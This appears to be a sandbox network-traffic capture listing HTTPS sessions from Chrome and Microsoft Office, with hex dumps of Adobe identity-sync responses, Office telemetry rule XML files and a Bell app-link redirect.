                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC1058INData Raw: 6f 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 70 6f 2e 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 70 6f 2e 61 73 79 6e 63 3d 74 72 75 65 3b 20 70 6f 2e 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3b 76 61 72 20 76 3d 77 2e 6e 61 76 69 67 61 74 6f 72 2c 6d 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 6d 65 74 61 27 29 3b 6d 2e 68 74 74 70 45 71 75 69 76 3d 27 6f 72 69 67 69 6e 2d 74 72 69 61 6c 27 3b 6d 2e 63 6f 6e 74 65 6e 74 3d 27 41 2f 6b 61 72 67 54 46 79 6b 38 4d 52 35 75 65 72 61 76 63 7a 65 66 2f 77 49 6c 54 6b 62 56 6b 31 71 58 51 65 73 70 33 39 6e 56 2b 78 4e 45 43 50 64 4c 42 56 65 59 66 66 78 72 4d 38 54 6d 5a 54 36 52 41 72 57 47 51 56 43 4a 30 4c 52 69 76 44 37 67 6c 63
                                                                                                                                                                                                                                                                                                                                      Data Ascii: o=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glc
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      112192.168.2.94989952.50.97.184433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC715OUTGET /id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=48B034FA53CF9FD10A490D44%40AdobeOrg&d_nsid=0&ts=1730380327750 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: dpm.demdex.net
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC820INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Content-Length: 2332
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      X-TID: iQO8DtX+QWg=
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                                                                      P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                      DCS: dcs-prod-irl1-2-v067-0e2a0bf10.edge-irl1.demdex.com 3 ms
                                                                                                                                                                                                                                                                                                                                      set-cookie: demdex=26594250982175076714259318767746782479; Max-Age=15552000; Expires=Tue, 29 Apr 2025 13:12:09 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC2332INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 32 36 34 30 34 36 39 30 32 34 30 39 39 38 37 34 37 31 32 34 32 37 34 31 35 36 30 33 36 34 35 32 33 37 39 30 37 32 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 36 47 31 79 6e 59 63 4c 50 75 69 51 78 59 5a 72 73 7a 5f 70 6b 71 66 4c 47 39 79 4d 58 42 70 62 32 7a 58 35 64 76 4a 64 59 51 4a 7a 50 58 49 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                                                                                                                                                      Data Ascii: {"d_mid":"26404690240998747124274156036452379072","id_sync_ttl":604800,"d_blob":"6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      113192.168.2.94990413.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:10 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1356
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 19a18c92-701e-0098-0fb0-26395f000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131210Z-16849878b782d4lwcu6h6gmxnw000000096g00000000ekv5
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      114192.168.2.94990613.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:10 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1393
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: ca4b2a6a-001e-000b-1aff-2615a7000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131210Z-17c5cb586f64sw5wh0dfzbdtvw00000001q000000000bd5c
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      115192.168.2.94990313.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:10 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 2284
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 69a14025-c01e-000b-6685-2ae255000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131210Z-159b85dff8f7svrvhC1DFWth2s00000001dg00000000ae6c
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      116192.168.2.94990218.239.18.884433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC699OUTGET /9hb8rBafRwb?_p=c11334dc9a0760eee0188ee3efb2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: bell.app.link
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC743INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Server: openresty
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:11 GMT
                                                                                                                                                                                                                                                                                                                                      location: https://bell.app.link/9hb8rBafRwb?_p=c11334dc9a0760eee0188ee3efb2
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      Critical-CH: Sec-CH-UA-Platform-Version,Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version,Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version,Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                      Vary: Sec-CH-UA-Platform-Version,Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                      cache-control: no-cache
                                                                                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                      Via: 1.1 9158fa1ac72d0c0684fe558c8655aeda.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P6
                                                                                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: x80MHZBjx5-t2HqZJ4s_d1xYzj-zZ6THpRVnMDZ-gwOOXgMQDY_nqg==
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC72INData Raw: 34 32 0d 0a 68 74 74 70 73 3a 2f 2f 62 65 6c 6c 2e 61 70 70 2e 6c 69 6e 6b 2f 39 68 62 38 72 42 61 66 52 77 62 3f 5f 70 3d 63 31 31 33 33 34 64 63 39 61 30 37 36 30 65 65 65 30 31 38 38 65 65 33 65 66 62 32 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 42https://bell.app.link/9hb8rBafRwb?_p=c11334dc9a0760eee0188ee3efb2
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      117192.168.2.94990713.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:10 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1356
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 2e99a458-901e-0067-29ae-26b5cb000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131210Z-16849878b78bjkl8dpep89pbgg000000087000000000ftxq
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      118192.168.2.94990513.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:10 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1393
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: f473ee8a-401e-00ac-6cf0-260a97000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131210Z-15b8d89586f8nxpt6ys645x5v00000000aug000000009094
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
